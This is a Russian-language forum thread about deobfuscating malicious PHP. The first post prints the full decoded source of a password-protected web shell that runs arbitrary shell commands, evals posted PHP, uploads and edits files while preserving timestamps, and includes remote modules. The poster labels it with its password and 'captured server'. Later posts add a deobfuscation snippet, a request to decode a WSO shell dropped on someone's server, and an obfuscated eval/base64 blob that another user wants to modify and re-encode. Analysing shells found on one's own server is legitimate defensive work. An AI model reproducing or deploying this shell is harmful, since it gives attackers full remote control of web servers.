Расколдовал: PHP: <?php@set_time_limit(0);@error_reporting(2);@set_magic_quotes_runtime(0);@ini_set('upload_max_filesize',10485760);@ini_set('post_max_size',10485760);@ini_set('file_uploads', true);@ini_set('display_errors',true);@ini_set('register_globals',true);@ini_set('register_long_arrays',true);@ini_set('max_execution_time',false);@ini_set('output_buffering',false);@ini_set('allow_url_fopen',true);$safemode=@ini_get('safe_mode');$magic_quotes=1;if (function_exists('get_magic_quotes_gpc')) $magic_quotes=get_magic_quotes_gpc();$phpver = str_replace('.','',phpversion());if (strlen($phpver)<3) while (strlen($phpver)<3) $phpver.='0';if(intval($phpver) < 410){$_POST=&$HTTP_POST_VARS;$_GET=&$HTTP_GET_VARS;$_SERVER=&$HTTP_SERVER_VARS;$_COOKIE=&$HTTP_COOKIE_VARS;$_FILES=&$HTTP_POST_FILES;}@ob_end_clean();$pw_pls="<form method=post><input type=text name=pw></form>";if (empty($_POST['pw'])) exit($pw_pls);if (!empty($_POST['pw']) && md5($_POST['pw'])!='79a248de1b0101cbfb4d1a7a60f6d4a5') exit($pw_pls);$pw="<input type=hidden name=pw value='".htmlspecialchars($_POST['pw'])."'>";if (!empty($_POST['usemodule'])) include($_POST['usemodule']);$work_dir = getcwd();if (strpos($work_dir,"\\")!==false) $work_dir=str_replace("\\","/",$work_dir);if (strpos(substr($work_dir,0,5),":")!==false) $os="win";else $os="nix";if (!empty($_POST['cd'])) $cd=stripslashes($_POST['cd']);else $cd = $work_dir;if (is_dir($cd)) chdir($cd);$run=($magic_quotes)?stripslashes($_POST['run']):$_POST['run'];$edit=stripslashes($_POST['edit']);if (!@is_file($edit)) $edit=$cd;if (!empty($_POST['eval'])) eval(($magic_quotes)?stripslashes($_POST['eval']):$_POST['eval']);if (!empty($_FILES['userfile']['tmp_name']) && is_uploaded_file($_FILES['userfile']['tmp_name'])) {$uploaddir = ereg_replace('/ ', '/', $cd."/");$uploadfile = $uploaddir.basename($_FILES['userfile']['name']);move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile);}if (isset($_POST['save'])) {if ($magic_quotes) $console = stripslashes($_POST['console']);else $console = $_POST['console'];$time = filemtime($edit);$f=@fopen($edit,"w");if ($f) { fwrite($f,$console); fclose($f); touch($edit,$time); $edit=$cd;}}if (!empty($edit) && file_exists($edit) && is_file($edit) && $edit!==$cd) {if ($os=='win'?can_write($edit):is_writable($edit)) $need_save_button=true;$f=@fopen($edit,"r");if ($f) { if (filesize($edit)>0) $retval = @fread($f,filesize($edit)); else $retval = "[empty]"; fclose($f);} else { $retval = "Can't open file: $edit\n";}} elseif (!empty($run)) {$cmd = $run;$retval = magic_execute($cmd);} elseif (file_exists($cd) && @is_dir($cd)) {if (!$safemode){ if ($os=='win') { $cmd = "dir ".str_replace("/","\\",$cd); $retval = magic_execute($cmd); } else { $cmd = "ls -la \"$cd\""; $retval = magic_execute($cmd); }}if (empty($retval)){ $dir=$cd; if($curdir = @opendir($dir)) { while($file = readdir($curdir)) { if($file != '.' && $file != '..') { $srcfile = $dir . '/' . $file; if(is_file($srcfile)) { if ($os=='win'?can_write($srcfile):is_writable($srcfile)) $retval .= " ".$file."\n"; else $retval .= "-- ".$file."\n"; } elseif(is_dir($srcfile)) { if ($os=='win'?can_write($srcfile):is_writable($srcfile)) $retval .= "d ".$file."\n"; else $retval .= "d- ".$file."\n"; } } } closedir($curdir); } else $retval = "Cant open directory\n";}}$id_exec = "cant get uid,gid";if ($tmp = magic_execute("id")) $id_exec = $tmp;elseif (function_exists('posix_getgid')){ $uids = @posix_getlogin(); $euids = @posix_getlogin(); $uid = @posix_getuid(); $euid = @posix_geteuid(); $gid = @posix_getgid(); if (!empty($uid)) $id_exec = "User: uid=$uids($uid) euid=$euid($euid) gid=$gid($gid)";}echo '<HTML><BODY onload="document.getElementById(\'cdfocus\').focus();"><HR>';echo date("d.m.Y h:i A")." OS:$os $id_exec safe_mode=$safemode";echo "<HR>";if (isset($need_save_button)) echo "<FORM method=post>";echo '<TEXTAREA id="console" name="console" style="width:100%;height:400px;">';if (isset($retval)) echo htmlspecialchars($retval);echo '</TEXTAREA>';if (isset($need_save_button)) echo "$pw<INPUT type='hidden' name='cd' value='".htmlspecialchars($cd)."'><INPUT type='hidden' name='edit' value='".htmlspecialchars($edit)."'><INPUT type=submit name=save value='Save'></FORM>";echo "<HR><FORM method=\"POST\">$pw";echo "<table><tr><td>dir:</td><td width=\"100%\"><input type=\"text\" style=\"width:100%;\" id=\"cdfocus\" name=\"cd\" value=\"".htmlspecialchars($cd)."\"></td></tr>". "<tr><td>run:</td><td><input type=\"text\" style=\"width:100%;\" name=\"run\" value=\"\"></td></tr>". "<tr><td>edit:</td><td><input type=\"text\" style=\"width:100%;\" name=\"edit\" value=\"".htmlspecialchars($edit)."\"></td></tr>". "</table>". "<input type=\"submit\" value=\"OK\"></FORM>";echo "<hr><form enctype=\"multipart/form-data\" method=\"post\">$pw<INPUT type='hidden' name='cd' value='".htmlspecialchars($cd)."'><input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"15000000\" />upload: <input name=\"userfile\" type=\"file\" /><input type=\"submit\" value=\"upload\" /></form><hr>";echo "<form method=post>$pw<textarea style=\"width:100%;height:100px;\" name='eval' id='eval'>phpinfo();</textarea><input type=submit value='EvalPHP'></form><hr>";echo "use module: <form method=post>$pw<input type='text' name='usemodule'> <input type=submit value='use'></form><hr>";echo "</BODY></HTML>";exit();function can_write($file) {if(file_exists($file)){if (is_file($file)) {$f=@fopen($file,"a ");if($f){fclose($f);return true;}}elseif (is_dir($file)) {if ($file[strlen($file)-1]!='/') $file.='/';$tfile = $file."testxxxtest";if (@touch($tfile)){@unlink($tfile);return true;}}}return false;}function magic_execute($cmd){ $res=false; if (function_exists('exec')) { @exec($cmd,$res); $res = join("\n",$res); } else if (function_exists('shell_exec')) $res = @shell_exec($cmd); else if (function_exists('system')) { @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean(); } else if(function_exists('passthru')) { @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean(); } else if (@is_resource($f = @popen($cmd,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } return $res;} PS: pw = "pf[dfxtyysqcthdth" (захваченныйсервер) PS2: Неплохой обфускатор, не видел раньше таких.
Основной код находится в файле с 4295 байта размером 8548 байт. Мини-код для деобфускации этого конкретного файла: PHP: <?php$fp = fopen('/tmp/x.php', 'r');fseek($fp, 4295);$obfuscated = fread($fp, 8548);fclose($fp);$plaintext = base64_decode( strtr( str_rot13($obfuscated), 'iXf91KmF/LRHqBPk24J6M5xuG_Dv8rYTapEthIS+CVeNQd0yszUlZbjn3w7WAoOcg', 'OdmDpSqIfZlviJuKPVs8nYA9ECjbGFce6o1/3gz0+ML7NXQRxyHtkU4hWwa5TrB2_' ) );echo $plaintext; Весь остальной код пытается скрыть эти оффсеты и алгоритмы. Последняя стадия деобфускации: http://pastebin.com/wY4pu9ZE В /tmp/x.php обфусцированный код.
Онлайновые деобфускаторы мало чем помогли( http://pastebin.com/NLm3E0Uc http://pastebin.com/HT6Fb6GD http://pastebin.com/VqVMchZh http://pastebin.com/EkhCCQZs http://pastebin.com/6MtaG8hX http://pastebin.com/zNqAmGUc
Не очень что-то получилось( . Известно,что это wso шелл,какой чудак на букву "м" льет и льет на мой сервак. Вот хочу расшифровать,помогите кто может)
Этот файл,случайно скинул,его то раскодировал через другие тулзы...а вот остальные... ПС. да и в этом файле не могу найти пароль авторизации,почему то..
Человек льет wso шелл на твой ресурс, но тебе зачем-то понадобилось его расшифровать и получить пароль. В чем цимес? Ну узнаешь ты, что пароль представляет из себя какой-нибудь хэш вида 66bb3129832f13fe73810d41dd2be0b3, что дальше то?
Добрый вечер,я новичок тут пока! Кто то может помочь с этим файлом? PHP: <?php if (!function_exists("T7FC56270E7A70FA81A5935B72EACBE29")) { function T7FC56270E7A70FA81A5935B72EACBE29($TF186217753C37B9B9F958D906208506E) { $TF186217753C37B9B9F958D906208506E = base64_decode($TF186217753C37B9B9F958D906208506E); $T7FC56270E7A70FA81A5935B72EACBE29 = 0; $T9D5ED678FE57BCCA610140957AFAB571 = 0; $T0D61F8370CAD1D412F80B84D143E1257 = 0; $TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[1]) << 8) + ord($TF186217753C37B9B9F958D906208506E[2]); $T3A3EA00CFC35332CEDF6E5E9A32E94DA = 3; $T800618943025315F869E4E1F09471012 = 0; $TDFCF28D0734569A6A693BC8194DE62BF = 16; $TC1D9F50F86825A1A2302EC2449C17196 = ""; $TDD7536794B63BF90ECCFD37F9B147D7F = strlen($TF186217753C37B9B9F958D906208506E); $TFF44570ACA8241914870AFBC310CDB85 = __FILE__; $TFF44570ACA8241914870AFBC310CDB85 = file_get_contents($TFF44570ACA8241914870AFBC310CDB85); $TA5F3C6A11B03839D46AF9FB43C97C188 = 0; preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $TFF44570ACA8241914870AFBC310CDB85, $TA5F3C6A11B03839D46AF9FB43C97C188); for (;$T3A3EA00CFC35332CEDF6E5E9A32E94DA<$TDD7536794B63BF90ECCFD37F9B147D7F;) { if (count($TA5F3C6A11B03839D46AF9FB43C97C188)) exit; if ($TDFCF28D0734569A6A693BC8194DE62BF == 0) { $TF623E75AF30E62BBD73D6DF5B50BB7B5 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8); $TF623E75AF30E62BBD73D6DF5B50BB7B5 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]); $TDFCF28D0734569A6A693BC8194DE62BF = 16; } if ($TF623E75AF30E62BBD73D6DF5B50BB7B5 & 0x8000) { $T7FC56270E7A70FA81A5935B72EACBE29 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 4); $T7FC56270E7A70FA81A5935B72EACBE29 += (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]) >> 4); if ($T7FC56270E7A70FA81A5935B72EACBE29) { $T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) & 0x0F) + 3; for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $T0D61F8370CAD1D412F80B84D143E1257++) $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012+$T0D61F8370CAD1D412F80B84D143E1257] = $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012-$T7FC56270E7A70FA81A5935B72EACBE29+$T0D61F8370CAD1D412F80B84D143E1257]; $T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571; } else { $T9D5ED678FE57BCCA610140957AFAB571 = (ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) << 8); $T9D5ED678FE57BCCA610140957AFAB571 += ord($TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]) + 16; for ($T0D61F8370CAD1D412F80B84D143E1257 = 0; $T0D61F8370CAD1D412F80B84D143E1257 < $T9D5ED678FE57BCCA610140957AFAB571; $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012+$T0D61F8370CAD1D412F80B84D143E1257++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA]); $T3A3EA00CFC35332CEDF6E5E9A32E94DA++; $T800618943025315F869E4E1F09471012 += $T9D5ED678FE57BCCA610140957AFAB571; } } else $TC1D9F50F86825A1A2302EC2449C17196[$T800618943025315F869E4E1F09471012++] = $TF186217753C37B9B9F958D906208506E[$T3A3EA00CFC35332CEDF6E5E9A32E94DA++]; $TF623E75AF30E62BBD73D6DF5B50BB7B5 <<= 1; $TDFCF28D0734569A6A693BC8194DE62BF--; if ($T3A3EA00CFC35332CEDF6E5E9A32E94DA == $TDD7536794B63BF90ECCFD37F9B147D7F) { $TFF44570ACA8241914870AFBC310CDB85 = implode("", $TC1D9F50F86825A1A2302EC2449C17196); $TFF44570ACA8241914870AFBC310CDB85 = "?".">".$TFF44570ACA8241914870AFBC310CDB85."<"."?"; return $TFF44570ACA8241914870AFBC310CDB85; } } } } eval(T7FC56270E7A70FA81A5935B72EACBE29("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")); ?>
http://pastebin.com/KxmMT5Ue Который раз уже говорю, что подобное можно самостоятельно раскрутить с помощью софта из первого поста в этой теме.
Большое спасибо и если можно ещё вопрос! Я вижу уже код, там нужно кое что исправить, после этого как снова получить обратно кодированный файл? И каким именно скриптом вы получили этодде ставил код что я дал.У меня что то не получается?
Найти обфускатор, которым это было сделано или самому разобраться в логике работы. Не понял. В смысле, чем я раскодировал? PHP Generic Eval Unpacker
